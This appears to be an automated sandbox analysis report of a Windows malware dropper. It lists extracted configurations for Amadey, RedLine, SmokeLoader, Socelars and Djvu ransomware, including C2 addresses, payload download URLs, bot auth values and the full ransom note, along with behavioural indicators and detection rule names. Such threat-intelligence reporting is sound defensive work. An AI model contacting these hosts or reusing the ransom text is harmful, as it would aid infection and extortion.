amadey | f42e768eaf5bbde818dfa4a2b00b1bc53d2e8365f646e049ecaea64d2512e9a3

Analysis

max time kernel
87s
max time network
153s
platform
windows10-2004_x64
resource
win10v2004-20220414-en
submitted
23-05-2022 04:51

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

F42E768EAF5BBDE818DFA4A2B00B1BC53D2E8365F646E.exe
Size

8.4MB
MD5

d88a5c3a6d4a31ed2913547456e585da
SHA1

a316bb7aa185656e8c64d8230d88a60784bf9b89
SHA256

f42e768eaf5bbde818dfa4a2b00b1bc53d2e8365f646e049ecaea64d2512e9a3
SHA512

5520e223301b3b632dc0dfe53e22097d430b6885c87dd075b2d12a7a72e0490729f0ae7149320e59295f238b6fea5cbf453caadea365567441f80cdd37fe85c4

Malware Config

Extracted

Family

amadey

Version

2.82

185.215.113.45/g4MbvE/index.php

Extracted

Family

socelars

http://www.hhgenice.top/

Extracted

Family

redline

Botnet

media13111

91.121.67.60:51630

Attributes

auth_value
c4a9a8afd186d5dc65329af23df0830c

Extracted

Family

smokeloader

Version

2020

http://membro.at/upload/

http://jeevanpunetha.com/upload/

http://misipu.cn/upload/

http://zavodooo.ru/upload/

http://targiko.ru/upload/

http://vues3d.com/upload/

rc4.i32

Extracted

Family

amadey

Version

3.10

185.215.113.38/f8dfksdj3/index.php

Extracted

Family

redline

Botnet

ruzki

185.215.113.85:10018

Attributes

auth_value
665880cf53f5187ff0e3d12b56218683

Extracted

Family

djvu

http://ugll.org/test3/get.php

Attributes

extension
.fefg
offline_id
eBNgvyGQV1Hmt9DBdxVRs8qPi1agsS7OaohPmit1
payload_url
http://zerit.top/dl/build2.exe
http://ugll.org/files/1/build3.exe
ransomnote
ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-j3AdKrnQie Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: admin@helpdata.top Reserve e-mail address to contact us: supportsys@airmail.cc Your personal ID: 0482JIjdm

rsa_pubkey.plain

Extracted

Family

redline

Botnet

@humus228p

185.215.113.24:15994

Attributes

auth_value
bb99a32fdff98741feb69d524760afae

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey

Detected Djvu ransomware 5 IoCs

Processes:

resource	yara_rule
behavioral2/memory/1516-346-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral2/memory/2284-345-0x0000000002240000-0x000000000235B000-memory.dmp	family_djvu
behavioral2/memory/1516-349-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral2/memory/1516-351-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral2/memory/1516-344-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu

Djvu Ransomware
Ransomware which is a variant of the STOP family.
ransomware djvu
Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089

Process spawned unexpected child process 3 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

rundll32.exerundll32.exerundll32.exe

description	pid	pid_target	process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	512	1004	rundll32.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5060	1004	rundll32.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6044	1004	rundll32.exe

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 5 IoCs

Processes:

resource	yara_rule
behavioral2/memory/4056-304-0x0000000000000000-mapping.dmp	family_redline
behavioral2/memory/4056-305-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline
behavioral2/memory/3048-330-0x0000000000880000-0x0000000000B40000-memory.dmp	family_redline
behavioral2/memory/4928-336-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline
behavioral2/memory/1012-368-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
stealer socelars

Socelars Payload 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\7zSC30829C6\Sat17385fe122c.exe	family_socelars
C:\Users\Admin\AppData\Local\Temp\7zSC30829C6\Sat17385fe122c.exe	family_socelars

suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
suricata
suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request
suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request
suricata
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata
suricata: ET MALWARE Vidar/Arkei/Megumin Stealer Keywords Retrieved
suricata: ET MALWARE Vidar/Arkei/Megumin Stealer Keywords Retrieved
suricata
suricata: ET MALWARE W32/Agent.OGR!tr.pws Stealer
suricata: ET MALWARE W32/Agent.OGR!tr.pws Stealer
suricata
suricata: ET MALWARE Win32/FFDroider CnC Activity M2
suricata: ET MALWARE Win32/FFDroider CnC Activity M2
suricata
suricata: ET MALWARE Win32/Filecoder.STOP Variant Public Key Download
suricata: ET MALWARE Win32/Filecoder.STOP Variant Public Key Download
suricata
suricata: ET MALWARE Win32/Filecoder.STOP Variant Request for Public Key
suricata: ET MALWARE Win32/Filecoder.STOP Variant Request for Public Key
suricata
suricata: ET MALWARE Win32/PrivateLoader Related Domain in DNS Lookup (fouratlinks .com)
suricata: ET MALWARE Win32/PrivateLoader Related Domain in DNS Lookup (fouratlinks .com)
suricata
suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3
suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3
suricata
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
suricata
suricata: ET MALWARE Win32/Vodkagats Loader Requesting Payload
suricata: ET MALWARE Win32/Vodkagats Loader Requesting Payload
suricata

ASPack v2.12-2.42 6 IoCs

Detects executables packed with ASPack v2.12-2.42

aspackv2

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\7zSC30829C6\libcurlpp.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zSC30829C6\libcurl.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zSC30829C6\libstdc++-6.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zSC30829C6\libstdc++-6.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zSC30829C6\libcurlpp.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zSC30829C6\libcurl.dll	aspack_v212_v242

Downloads MZ/PE file

Executes dropped EXE 42 IoCs

Processes:

setup_install.exeSat17e037bb5cb1914dd.exeSat1716af8826a01bf4a.exeSat1787f49a38.exeSat172ee445a2.exeSat17385fe122c.exeSat172822ff563b5326.execmd.exeSat17fc809274f.exeSat17777767f9d8b1.exeSat174f9479fae9649b.exeSat17fc809274f.tmpSat17777767f9d8b1.tmpSat171bd3ce8bbc6ed.exeSat17fc809274f.exeSat177a0c7e789ece.exeSat1787f49a38.exeSat175bcb721ec3.exetkools.exeSat17fc809274f.tmpSIOFYL_.eXETrustedInstaller.exeSat177a0c7e789ece.exeSat177a0c7e789ece.exeNiceProcessX64.bmp.exetkools.exeService.bmp.exerrmix.exe.exeFJEfRXZ.exe.exemixinte2205.bmp.exere.exe.exeSetupMEXX.exe.exerezki1.bmp.exetest33.bmp.exePokiness.bmp.exereal2201.bmp.exeFenix_11.bmp.exe6523.exe.exefxdd.bmp.exeWerFault.exepen4ik_v0.7b__windows_64.bmp.exewam.exe.exe

pid	process
4780	setup_install.exe
4020	Sat17e037bb5cb1914dd.exe
2496	Sat1716af8826a01bf4a.exe
2408	Sat1787f49a38.exe
1072	Sat172ee445a2.exe
2012	Sat17385fe122c.exe
4352	Sat172822ff563b5326.exe
1000	cmd.exe
3572	Sat17fc809274f.exe
948	Sat17777767f9d8b1.exe
1316	Sat174f9479fae9649b.exe
3104	Sat17fc809274f.tmp
2504	Sat17777767f9d8b1.tmp
5072	Sat171bd3ce8bbc6ed.exe
2492	Sat17fc809274f.exe
4532	Sat177a0c7e789ece.exe
3496	Sat1787f49a38.exe
3440	Sat175bcb721ec3.exe
3720	tkools.exe
424	Sat17fc809274f.tmp
3356	SIOFYL_.eXE
3772	TrustedInstaller.exe
2016	Sat177a0c7e789ece.exe
4056	Sat177a0c7e789ece.exe
1240	NiceProcessX64.bmp.exe
4672	tkools.exe
644	Service.bmp.exe
3140	rrmix.exe.exe
4768	FJEfRXZ.exe.exe
4564	mixinte2205.bmp.exe
1092	re.exe.exe
4808	SetupMEXX.exe.exe
3700	rezki1.bmp.exe
2284	test33.bmp.exe
3696	Pokiness.bmp.exe
3796	real2201.bmp.exe
3048	Fenix_11.bmp.exe
1276	6523.exe.exe
816	fxdd.bmp.exe
2320	WerFault.exe
2504	pen4ik_v0.7b__windows_64.bmp.exe
4252	wam.exe.exe

VMProtect packed file 2 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

Processes:

resource	yara_rule
behavioral2/memory/816-332-0x0000000000810000-0x00000000010D1000-memory.dmp	vmprotect
behavioral2/memory/2408-362-0x00000000009D0000-0x0000000001291000-memory.dmp	vmprotect

Checks computer location settings 2 TTPs 11 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

mshta.exemshta.exeSat174f9479fae9649b.exeF42E768EAF5BBDE818DFA4A2B00B1BC53D2E8365F646E.exeSat17fc809274f.tmpSat1716af8826a01bf4a.exetkools.execmd.exeSat1787f49a38.exemshta.exeSIOFYL_.eXE

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation	Sat174f9479fae9649b.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation	F42E768EAF5BBDE818DFA4A2B00B1BC53D2E8365F646E.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation	Sat17fc809274f.tmp
Key value queried	\REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation	Sat1716af8826a01bf4a.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation	tkools.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation	Sat1787f49a38.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation	SIOFYL_.eXE

Loads dropped DLL 10 IoCs

Processes:

setup_install.exeSat17fc809274f.tmpSat17777767f9d8b1.tmpSat17fc809274f.tmprundll32.exeregsvr32.exe

pid	process
4780	setup_install.exe
4780	setup_install.exe
4780	setup_install.exe
4780	setup_install.exe
4780	setup_install.exe
3104	Sat17fc809274f.tmp
2504	Sat17777767f9d8b1.tmp
424	Sat17fc809274f.tmp
2768	rundll32.exe
408	regsvr32.exe

Modifies file permissions 1 TTPs 1 IoCs
discovery

File Permissions Modification
T1222

Processes:

icacls.exe

pid process

2996 icacls.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

pid	process
2996	icacls.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

FJEfRXZ.exe.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	FJEfRXZ.exe.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	FJEfRXZ.exe.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 9 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

22 ip-api.com
101 ipinfo.io
102 ipinfo.io
201 api.2ip.ua
220 ipinfo.io
279 api.2ip.ua
190 ipinfo.io
191 ipinfo.io
202 api.2ip.ua
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
Suspicious use of SetThreadContext 1 IoCs

Processes:

Sat177a0c7e789ece.exe

description pid process target process

PID 4532 set thread context of 4056 4532 Sat177a0c7e789ece.exe Sat177a0c7e789ece.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

flow	ioc
22	ip-api.com
101	ipinfo.io
102	ipinfo.io
201	api.2ip.ua
220	ipinfo.io
279	api.2ip.ua
190	ipinfo.io
191	ipinfo.io
202	api.2ip.ua

description	pid	process	target process
PID 4532 set thread context of 4056	4532	Sat177a0c7e789ece.exe	Sat177a0c7e789ece.exe

Program crash 18 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
2316	2768	WerFault.exe	rundll32.exe
2372	4564	WerFault.exe	mixinte2205.bmp.exe
1772	4564	WerFault.exe	mixinte2205.bmp.exe
5080	4564	WerFault.exe	mixinte2205.bmp.exe
2884	4564	WerFault.exe	mixinte2205.bmp.exe
4592	4564	WerFault.exe	mixinte2205.bmp.exe
4740	4564	WerFault.exe	mixinte2205.bmp.exe
2320	4564	WerFault.exe	mixinte2205.bmp.exe
4040	4564	WerFault.exe	mixinte2205.bmp.exe
3488	4564	WerFault.exe	mixinte2205.bmp.exe
2148	3796	WerFault.exe	real2201.bmp.exe
4232	4808	WerFault.exe	SetupMEXX.exe.exe
4948	4232	WerFault.exe	rundll32.exe
3696	5464	WerFault.exe	rtst1077.exe
5944	5388	WerFault.exe	rundll32.exe
1524	5400	WerFault.exe	LzmwAqmV.exe
5260	3388	WerFault.exe	LzmwAqmV.exe
4040	5696	WerFault.exe	logger2.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

Sat172ee445a2.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Sat172ee445a2.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Sat172ee445a2.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Sat172ee445a2.exe

Creates scheduled task(s) 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

5640 schtasks.exe
5340 schtasks.exe
3556 schtasks.exe
440 schtasks.exe
4580 schtasks.exe
Delays execution with timeout.exe 2 IoCs
evasion

Processes:

timeout.exetimeout.exe

pid process

4672 timeout.exe
3572 timeout.exe
Kills process with taskkill 5 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid process

3116 taskkill.exe
2348 taskkill.exe
3776 taskkill.exe
4396 taskkill.exe
5868 taskkill.exe

pid	process
5640	schtasks.exe
5340	schtasks.exe
3556	schtasks.exe
440	schtasks.exe
4580	schtasks.exe

pid	process
4672	timeout.exe
3572	timeout.exe

pid	process
3116	taskkill.exe
2348	taskkill.exe
3776	taskkill.exe
4396	taskkill.exe
5868	taskkill.exe

Modifies system certificate store 2 TTPs 7 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

Sat17385fe122c.exeSat174f9479fae9649b.exe

description	ioc	process
Set value (data)	\REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\151682F5218C0A511C28F4060A73B9CA78CE9A53\Blob = 030000000100000014000000151682f5218c0a511c28f4060a73b9ca78ce9a531400000001000000140000007c4296aede4b483bfa92f89e8ccf6d8ba972379504000000010000001000000029f1c1b26d92e893b6e6852ab708cce10f00000001000000200000005aef843ffcf2ec7055f504a162f229f8391c370ff3a6163d2db3f3d604d622be19000000010000001000000070d4f0bec2078234214bd651643b02405c0000000100000004000000800100001800000001000000100000002fe1f70bb05d7c92335bc5e05b984da62000000001000000640400003082046030820248a0030201020210079e492886376fd40848c23fc631e463300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3230303930343030303030305a170d3235303931353136303030305a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f742058323076301006072a8648ce3d020106052b8104002203620004cd9bd59f80830aec094af3164a3e5ccf77acde67050d1d07b6dc16fb5a8b14dbe27160c4ba459511898eea06dff72a161ca4b9c5c532e003e01e8218388bd745d80a6a6ee60077fb02517d22d80a6e9a5b77dff0fa41ec39dc75ca68070c1feaa381e53081e2300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604147c4296aede4b483bfa92f89e8ccf6d8ba9723795301f0603551d2304183016801479b459e67bb6e5e40173800888c81a58f6e99b6e303206082b0601050507010104263024302206082b060105050730028616687474703a2f2f78312e692e6c656e63722e6f72672f30270603551d1f0420301e301ca01aa0188616687474703a2f2f78312e632e6c656e63722e6f72672f30220603551d20041b30193008060667810c010201300d060b2b0601040182df13010101300d06092a864886f70d01010b050003820201001b7f252b907a0876007718e1c32e8a364c417ebf174be330d75b0c7e9c96986f7bb068c02444cce2f2fcd1eadbd29f01f9174d0c9d55fda5ad6dd22f3f4b72c02eae73c7251657c23e15ade031d10a84846c6278423122461aed7a40bf9716814477ca6c7b5d215c07f2119121bfe12fc2ef6efd0520e4b4f779f32dbb372af0c6b1acac51f51fb35a1e66ce580718387f71a93c83bad7bc829e9a760f9eb029fdcbf38907481bfeab932e14210d5faf8eb754ab5d0ed45b4c71d092ea3da3369b7c1fe03b55b9d85353cc8366bb4adc810600188bf4b3d748b11341b9c4b69ecf2c778e42200b807e9fc5ab48dbbc6f048d6c4629020d708a1df11273b64624429e2a1718e3acc798c272cc6d2d766ddd2c2b2696a5cf21081be5da2fcbef9f7393aef8365f478f9728ceabe29826988bfdee28322229ed4c9509c420fa07e1862c44f68147c0e46232ed1dd83c488896c35e91b6af7b59a4eee3869cc78858ca282a66559b8580b91dd8402bc91c133ca9ebde99c21640f6f5a4ae2a256c52bac7044cb432bbfc385ca00c617b57ec774e50cfaf06a20f378ce10ed2d32f1abd9c713ecce1f8d1a8a3bd04f619c0f986aff50e1aaa956befca47714b631c4d96db55230a9d0f8175a0e640f56446036ecefa6a7d06eca4340674da53d8b9b8c6237da9f82a2da482a62e2d11cae6cd31587985e6721ca79fd34cd066d0a7bb	Sat17385fe122c.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	Sat174f9479fae9649b.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	Sat174f9479fae9649b.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	Sat17385fe122c.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	Sat17385fe122c.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 5c0000000100000004000000001000001900000001000000100000002fe1f70bb05d7c92335bc5e05b984da60f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f63030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e814000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e20000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d3675